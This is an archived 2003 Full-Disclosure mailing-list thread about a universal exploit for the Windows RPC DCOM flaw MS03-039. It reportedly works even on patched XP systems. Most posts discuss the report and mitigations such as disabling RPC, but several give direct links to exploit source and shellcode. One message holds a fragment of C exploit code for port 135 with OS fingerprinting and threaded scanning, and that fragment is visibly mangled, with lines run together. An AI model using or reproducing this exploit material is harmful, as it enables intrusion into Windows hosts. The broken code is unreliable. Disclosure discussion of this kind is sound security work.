[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Exploit code can be found here:
http://www.securitylab.ru/40754.html
This code work with all security fixes. It's very dangerous.
- Original Message -
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability
> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is
> again actual.
> 2. It was reported by exploit author (and confirmed), Windows XP SP1
> with all security fixes installed still vulnerable to variant of the
> same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> exists, but code execution is probably possible. Technical details are
> sent to Microsoft, waiting for confirmation.
>
> Dear ISPs. Please instruct you customers to use personal fireWALL in
> Windows XP.
>
> --
> http://www.security.nnov.ru
> /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> | ZARAZA U 3APA3A }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
If I am reading this correctly in the sense is it being stated that with
all patches and hotfixes systems are still vulnerabile to some form of the
RPC exploit as it relates to ms039?
Thanks!
Stone
3APA3A
<[EMAIL PROTECTED]To: [EMAIL PROTECTED], [EMAIL
PROTECTED],
NNOV.RU> [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
10/10/2003 10:48 Subject: Bad news on RPC DCOM
vulnerability
AM
Please respond to
3APA3A
Dear [EMAIL PROTECTED],
There are few bad news on RPC DCOM vulnerability:
1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is
again actual.
2. It was reported by exploit author (and confirmed), Windows XP SP1
with all security fixes installed still vulnerable to variant of the
same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
exists, but code execution is probably possible. Technical details are
sent to Microsoft, waiting for confirmation.
Dear ISPs. Please instruct you customers to use personal fireWALL in
Windows XP.
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A }
+-o66o--+ /
|/
You know my name - look up my number (The Beatles)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: > For us that can not interpret the site, what more information can be > provided. > > Bobby > FYI, the site is in Russian. Here are the steps for enlightening yourself: 1. Visit your favorite search engine. 2. Type the words "online translator russian" (without quotation marks) into the query field. 3. Visit one of the many free or paid translating services that are listed there. 4. Select your preferred language (English, I'd wager), enter the URL, and let the translator go to work. 5. Read the slightly stilted but informative result. FWIW, entering that query into google and clicking "I'm feeling lucky" gives good results. Good luck. HTH, petard -- If your message really might be confidential, download my PGP key here: http://petard.freeshell.org/petard.asc and encrypt it. Otherwise, save bandwidth and lose the disclaimer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
So I can "assume" no other information is posted, other than this site, to collaborate the RPC issue is not resolved or should we all try to translate this site using the helpful hints, which they are? BB -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of petard Sent: Friday, October 10, 2003 4:40 PM To: Brown, Bobby (US - Hermitage) Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: > For us that can not interpret the site, what more information can be > provided. > > Bobby > FYI, the site is in Russian. Here are the steps for enlightening yourself: 1. Visit your favorite search engine. 2. Type the words "online translator russian" (without quotation marks) into the query field. 3. Visit one of the many free or paid translating services that are listed there. 4. Select your preferred language (English, I'd wager), enter the URL, and let the translator go to work. 5. Read the slightly stilted but informative result. FWIW, entering that query into google and clicking "I'm feeling lucky" gives good results. Good luck. HTH, petard -- If your message really might be confidential, download my PGP key here: http://petard.freeshell.org/petard.asc and encrypt it. Otherwise, save bandwidth and lose the disclaimer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
If this is at all really a new version of the rpc exploit that presents the attacker with the holy grail, then it is probably as bad as others have suggested. I haven't tested yet. But one thing I'd do is go through all of my windows systems and turned the RPC service off. Patching is one thing, but if you don't need the service, turn it off. On Out! On Fri, 2003-10-10 at 20:05, Bobby Brown wrote: > So I can "assume" no other information is posted, other than this site, to > collaborate the RPC issue is not resolved or should we all try to translate this > site using the helpful hints, which they are? > > > BB > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] Behalf Of petard > Sent: Friday, October 10, 2003 4:40 PM > To: Brown, Bobby (US - Hermitage) > Cc: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability > > > On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: > > For us that can not interpret the site, what more information can be > > provided. > > > > Bobby > > > FYI, the site is in Russian. Here are the steps for enlightening yourself: > > 1. Visit your favorite search engine. > 2. Type the words "online translator russian" (without quotation marks) into > the query field. > 3. Visit one of the many free or paid translating services that are listed there. > 4. Select your preferred language (English, I'd wager), enter the URL, and let > the translator go to work. > 5. Read the slightly stilted but informative result. > > FWIW, entering that query into google and clicking "I'm feeling lucky" gives good > results. > > Good luck. > > HTH, > > petard > > > -- > If your message really might be confidential, download my PGP key here: > http://petard.freeshell.org/petard.asc > and encrypt it. Otherwise, save bandwidth and lose the disclaimer. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
There is not much info there, the site basically goes on saying that somebody
("karlss0n") posted the exploit http://www.securitylab.ru/_exploits/rpc2.c.txt
to their bbs, the exploit is not using fixed jump addresses, which makes it work
with several versions of Windows.
Then somebody has tried it against a patched XP and it seems to be working.
Currently this exploit can be used for a shell on an unpatched (ms03-039) XP
(they say you need to put a shellcode into file bshell2 and fix a couple of
offsets, the sample code is at http://www.securitylab.ru/_exploits/shell.asm.txt)
On a patched XP this sploit only produces a DoS.
the discussion is here -
http://forum.securitylab.ru/forum_posts.asp?TID=5642&PN=1&TPN=3 ,more
informative, they talk about using SEH.
P.S. I am not associated with anybody from this site/posting in; I am simply
translating the site for those who cannot read Russian, because online
translators are shite :)
Quoting Bobby Brown <[EMAIL PROTECTED]>:
> So I can "assume" no other information is posted, other than this site, to
> collaborate the RPC issue is not resolved or should we all try to translate
> this site using the helpful hints, which they are?
>
>
> BB
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of petard
> Sent: Friday, October 10, 2003 4:40 PM
> To: Brown, Bobby (US - Hermitage)
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
>
>
> On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage)
> wrote:
> > For us that can not interpret the site, what more information can be
> > provided.
> >
> > Bobby
> >
> FYI, the site is in Russian. Here are the steps for enlightening yourself:
>
> 1. Visit your favorite search engine.
> 2. Type the words "online translator russian" (without quotation marks) into
> the query field.
> 3. Visit one of the many free or paid translating services that are listed
> there.
> 4. Select your preferred language (English, I'd wager), enter the URL, and
> let
> the translator go to work.
> 5. Read the slightly stilted but informative result.
>
> FWIW, entering that query into google and clicking "I'm feeling lucky" gives
> good
> results.
>
> Good luck.
>
> HTH,
>
> petard
>
>
> --
> If your message really might be confidential, download my PGP key here:
> http://petard.freeshell.org/petard.asc
> and encrypt it. Otherwise, save bandwidth and lose the disclaimer.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
On Fri, Oct 10, 2003 at 07:05:46PM -0500, Bobby Brown wrote: > So I can "assume" no other information is posted, other than this site, to > collaborate the RPC issue is not resolved or should we all try to translate this > site using the helpful hints, which they are? > > k-otik posted some similar if not identical code, corroborating (to a point anyway) its effectiveness. (It most likely worked for one of them if they posted it.) I suggest taking the linked code, compiling it (use MSVC7) and testing it to confirm for yourself. Please test on a machine that's not connected to the internet, though :-) HTH, petard -- If your message really might be confidential, download my PGP key here: http://petard.freeshell.org/petard.asc and encrypt it. Otherwise, save bandwidth and lose the disclaimer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
For us that can not interpret the site, what more information can be
provided.
Bobby
-Original Message-
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Exploit code can be found here:
http://www.securitylab.ru/40754.html
This code work with all security fixes. It's very dangerous.
- Original Message -
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability
> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is
> again actual.
> 2. It was reported by exploit author (and confirmed), Windows XP SP1
> with all security fixes installed still vulnerable to variant of the
> same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> exists, but code execution is probably possible. Technical details are
> sent to Microsoft, waiting for confirmation.
>
> Dear ISPs. Please instruct you customers to use personal fireWALL in
> Windows XP.
>
> --
> http://www.security.nnov.ru
> /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> | ZARAZA U 3APA3A }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This message (including any attachments) contains confidential information
intended for a specific individual and purpose, and is protected by law. If
you are not the intended recipient, you should delete this message. Any
disclosure, copying, or distribution of this message, or the taking of any
action based on it, is strictly prohibited.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
For non-Russian speakers use http://babelfish.altavista.com/
--
Macroscape Solutions Inc.
information technology foresight
http://www.macroscape.com
--
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Brown, Bobby
(US - Hermitage)
Sent: Friday, October 10, 2003 3:34 PM
To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
For us that can not interpret the site, what more information can be
provided.
Bobby
-Original Message-
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Exploit code can be found here:
http://www.securitylab.ru/40754.html
This code work with all security fixes. It's very dangerous.
- Original Message -
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability
> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is
> again actual.
> 2. It was reported by exploit author (and confirmed), Windows XP SP1
> with all security fixes installed still vulnerable to variant of the
> same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> exists, but code execution is probably possible. Technical details are
> sent to Microsoft, waiting for confirmation.
>
> Dear ISPs. Please instruct you customers to use personal fireWALL in
> Windows XP.
>
> --
> http://www.security.nnov.ru
> /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> | ZARAZA U 3APA3A }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This message (including any attachments) contains confidential information
intended for a specific individual and purpose, and is protected by law. If
you are not the intended recipient, you should delete this message. Any
disclosure, copying, or distribution of this message, or the taking of any
action based on it, is strictly prohibited.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
** CRM114 Whitelisted by: securityfocus.com **
** ACCEPT: CRM114 Whitelisted by: securityfocus.com **
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Quoting Brown, Bobby (US - Hermitage) ([EMAIL PROTECTED]):
> For us that can not interpret the site, what more information can be
> provided.
>
Funny enough, it is a russian translatiion of the original message you
replying to:
> - Original Message -
> From: "3APA3A" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
> <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Friday, October 10, 2003 6:48 PM
> Subject: Bad news on RPC DCOM vulnerability
>
>
> > Dear [EMAIL PROTECTED],
> >
> > There are few bad news on RPC DCOM vulnerability:
> >
> > 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is
> > again actual.
> > 2. It was reported by exploit author (and confirmed), Windows XP SP1
> > with all security fixes installed still vulnerable to variant of the
> > same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> > exists, but code execution is probably possible. Technical details are
> > sent to Microsoft, waiting for confirmation.
> >
> > Dear ISPs. Please instruct you customers to use personal fireWALL in
> > Windows XP.
> >
> > --
> > http://www.security.nnov.ru
> > /\_/\
> > { , . } |\
> > +--oQQo->{ ^ }<-+ \
> > | ZARAZA U 3APA3A }
> > +-o66o--+ /
> > |/
> > You know my name - look up my number (The Beatles)
> >
> >
> >
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Yeah, but the original poster 3APA3A withheld the actual exploit, which is
available on that site.
- Original Message -
From: "Vladimir Parkhaev" <[EMAIL PROTECTED]>
>
> Funny enough, it is a russian translatiion of the original message you
> replying to:
>
>
> > - Original Message -
> > From: "3APA3A" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
> > <[EMAIL PROTECTED]>
> > Cc: <[EMAIL PROTECTED]>
> > Sent: Friday, October 10, 2003 6:48 PM
> > Subject: Bad news on RPC DCOM vulnerability
> >
> >
> > > Dear [EMAIL PROTECTED],
> > >
> > > There are few bad news on RPC DCOM vulnerability:
> > >
> > > 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD
is
> > > again actual.
> > > 2. It was reported by exploit author (and confirmed), Windows XP
SP1
> > > with all security fixes installed still vulnerable to variant of
the
> > > same bug. Windows 2000/2003 was not tested. For a while only DoS
exploit
> > > exists, but code execution is probably possible. Technical details
are
> > > sent to Microsoft, waiting for confirmation.
> > >
> > > Dear ISPs. Please instruct you customers to use personal fireWALL
in
> > > Windows XP.
> > >
> > > --
> > > http://www.security.nnov.ru
> > > /\_/\
> > > { , . } |\
> > > +--oQQo->{ ^ }<-+ \
> > > | ZARAZA U 3APA3A }
> > > +-o66o--+ /
> > > |/
> > > You know my name - look up my number (The Beatles)
> > >
> > >
> > >
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];
int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = 6;
tv2.tv_usec = 0;
memset(buf,'\0',sizeof(buf));
send(sock,(char *)peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, (char *)buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln)
// {
send(sock,(const char *)peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, (char *)buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//win2kby default. Nt4 not added..
}
}
else return(-1);
// }
//}
// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
//
int attack(char *ip1,bool atack)
{
unsigned char rawData[1036];
memcpy(rawData,rawData1,1036);
unsigned char shellcode[5];
char ip[200];
strcpy(ip,ip1);
WSADATA WSAData;
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[5];
unsigned char buf2[5];
printf("%s\n",ip);
//printf("RPC DCOM overflow Vulnerability discoveried by
//NSFOCUS\n");
//printf("Code by FlashSky,Flashsky xfocus org\n");
//printf("Welcome to our Site: http://www.xfocus.org\n";);
//printf("Welcome to our Site: http://www.venustech.com.cn\n";);
/*if(argc!=3)
{
printf("%s targetIP targetOS\ntargets:\n",argv[0]);
for(int i=0;itm) while(thread_count>tm) Sleep(100);
CreateThread(NULL,0,&ThreadProc,"",0,NULL);
Sleep(10);
fflush(fp1);
}
}
Sleep(6);
fclose(fp1);
}
>
> Bobby
>
> -Original Message-
> From: Alex [mailto:[EMAIL PROTECTED]
> Sent: Friday, October 10, 2003 1:09 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
>
>
> Exploit code can be found here:
> http://www.securitylab.ru/40754.html
>
> This code work with all security fixes. It's very dangerous.
>
> - Original Message -
> From: "3APA3A" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
> <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Friday, October 10, 2003 6:48 PM
> Subject: Bad news on RPC DCOM vulnerability
>
>
> > Dear [EMAIL PROTECTED],
> >
> > There are few bad news on RPC DCOM vulnerability:
> >
> > 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is
> > again actual.
> > 2. It was reported by exploit author (and confirmed), Windows XP SP1
> > with all security fixes installed still vulnerable to variant of the
> > same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> > exists, but code execution is probably possible. Technical details are
> > sent to Microsoft, waiting for confirmation.
> >
> > Dear ISPs. Please instruct you customers to use personal fireWALL in
> > Windows XP.
> >
> > --
> > http://www.security.nnov.ru
> > /\_/\
> > { , . } |\
> > +--oQQo->{ ^ }<-+ \
> > | ZARAZA U 3APA3A }
> > +-o66o--+ /
> > |/
> > You know my name - look up my number (The Beatles)
> >
> >
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> This message (including any attachments) contains confidential information
> intended for a specific individual and purpose, and is protected by law. If
> you are not the intended recipient, you should delete this message. Any
> disclosure, copying, or distribution of this message, or the taking of any
> action based on it, is strictly prohibited.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Not much info on the page but here goes the juicy part.
Exploit: http://www.securitylab.ru/_exploits/rpc2.c.txt
Shellcode: http://www.securitylab.ru/_exploits/shell.asm.txt
Based on user responses, this is, in fact, working exploit that will
work on already patched systems. It's only a matter of time for
compiled binary to surface.
Dimitri
|-+-->
| | "Brown, Bobby (US -|
| | Hermitage)"|
| | <[EMAIL PROTECTED]>|
| | Sent by: |
| | [EMAIL PROTECTED]|
| | .netsys.com|
| | |
| | |
| | 10/10/2003 03:34 PM|
| | |
|-+-->
>--|
|
|
| To: "'Alex'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL
PROTECTED], |
|[EMAIL PROTECTED]
|
| cc: [EMAIL PROTECTED]
|
| Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
|
>--|
For us that can not interpret the site, what more information can be
provided.
Bobby
-Original Message-
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Exploit code can be found here:
http://www.securitylab.ru/40754.html
This code work with all security fixes. It's very dangerous.
- Original Message -
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability
> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1. Universal exploit for MS03-039 exists in-the-wild, PINK
FLOYD is
> again actual.
> 2. It was reported by exploit author (and confirmed), Windows XP
SP1
> with all security fixes installed still vulnerable to variant of
the
> same bug. Windows 2000/2003 was not tested. For a while only DoS
exploit
> exists, but code execution is probably possible. Technical details
are
> sent to Microsoft, waiting for confirmation.
>
> Dear ISPs. Please instruct you customers to use personal
fireWALL in
> Windows XP.
>
> --
> http://www.security.nnov.ru
> /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> | ZARAZA U 3APA3A }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This message (including any attachments) contains confidential
information
intended for a specific individual and purpose, and is protected by
law. If
you are not the intended recipient, you should delete this message.
Any
disclosure, copying, or distribution of this message, or the taking of
any
action based on it, is strictly prohibited.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *Gasp!* You've never seen Babel Fish translate a webpage? http://babelfish.altavista.com/ And select "Translate a Web Page"... Presto! It's rough, but gets you close enough. Regards, - -Matt. - -- Matthew D. Lammers, CISSP Columbus, Ohio, US - -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brown, Bobby (US - Hermitage) Sent: Friday, October 10, 2003 3:34 PM To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability For us that can not interpret the site, what more information can be provided. Bobby - -Original Message- From: Alex [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:09 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability Exploit code can be found here: http://www.securitylab.ru/40754.html -BEGIN PGP SIGNATURE- Version: PGP 8.0 iQA/AwUBP4cgtwcf69dS5KepEQL5xQCeJjvocPI8r/qPCYCP61MvbGuxxWgAoJie I6zE7ut38aXb1SpOaIK8vY91 =dNPg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
